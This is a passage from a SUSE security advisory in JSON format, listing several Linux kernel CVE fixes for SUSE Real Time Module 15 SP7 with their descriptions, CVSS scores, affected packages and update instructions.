"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71143"
},
{
"cve": "CVE-2025-71145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: phy: isp1301: fix non-OF device reference imbalance\n\nA recent change fixing a device reference leak in a UDC driver\nintroduced a potential use-after-free in the non-OF case as the\nisp1301_get_client() helper only increases the reference count for the\nreturned I2C device in the OF case.\n\nIncrement the reference count also for non-OF so that the caller can\ndecrement it unconditionally.\n\nNote that this is inherently racy just as using the returned I2C device\nis since nothing is preventing the PHY driver from being unbound while\nin use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71156"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ngve: defer interrupt enabling until NAPI registration\n\nCurrently, interrupts are automatically enabled immediately upon\nrequest. This allows interrupt to fire before the associated NAPI\ncontext is fully initialized and cause failures like below:\n\n[ 0.946369] Call Trace:\n[ 0.946369] \u003cIRQ\u003e\n[ 0.946369] __napi_poll+0x2a/0x1e0\n[ 0.946369] net_rx_action+0x2f9/0x3f0\n[ 0.946369] handle_softirqs+0xd6/0x2c0\n[ 0.946369] ? handle_edge_irq+0xc1/0x1b0\n[ 0.946369] __irq_exit_rcu+0xc3/0xe0\n[ 0.946369] common_interrupt+0x81/0xa0\n[ 0.946369] \u003c/IRQ\u003e\n[ 0.946369] \u003cTASK\u003e\n[ 0.946369] asm_common_interrupt+0x22/0x40\n[ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10\n\nUse the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto\nenablement and explicitly enable the interrupt in NAPI initialization\npath (and disable it during NAPI teardown).\n\nThis ensures that interrupt lifecycle is strictly coupled with\nreadiness of NAPI context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71156",
"url": "https://www.suse.com/security/cve/CVE-2025-71156"
},
{
"category": "external",
"summary": "SUSE Bug 1257167 for CVE-2025-71156",
"url": "https://bugzilla.suse.com/1257167"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71157"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71157",
"url": "https://www.suse.com/security/cve/CVE-2025-71157"
},
{
"category": "external",
"summary": "SUSE Bug 1257168 for CVE-2025-71157",
"url": "https://bugzilla.suse.com/1257168"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
